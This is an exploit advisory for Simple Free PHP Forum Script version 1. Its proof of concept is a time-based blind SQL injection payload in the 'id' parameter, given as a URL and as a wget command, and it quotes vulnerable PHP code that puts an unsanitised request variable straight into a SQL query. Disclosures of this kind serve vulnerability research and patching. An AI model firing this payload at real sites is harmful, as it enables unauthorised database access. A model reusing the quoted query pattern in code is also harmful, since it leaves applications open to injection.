Simple Free PHP Forum Script versions 1 and below suffer from multiple remote SQL injection vulnerabilities.
cfc43fc9e4e6d7837cfb56eea10a2a41183c5a9c1c7b0a374599091486bc34fd
# Exploit Title: Simple Free PHP Forum Script <= 1 SQL Injection Vulnerability
# Date: 2011-10-19
# Author: Skraps, Jackie Craig Sparks(jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: https://www.phpforumscript.com/?page_id=11
# Version: 1 (tested)
This script is riddled of unsanitized REQUEST variables that allows multiple SQL injections.
--------------
PoC
--------------
https://127.0.0.1/forum/index.php?show=cat&id=1' AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0) AND id='1
wget "https://127.0.0.1/forum/index.php?show=cat&id=1' AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0) AND id='1"
--------------
Vurnerable Code
--------------
Line 150 of discussion.php:
case 'cat':
$get_id=$_REQUEST["id"];
$page->Set("cat_id",$get_id);
$query="SELECT * FROM discussion_category WHERE id='$get_id' LIMIT 1";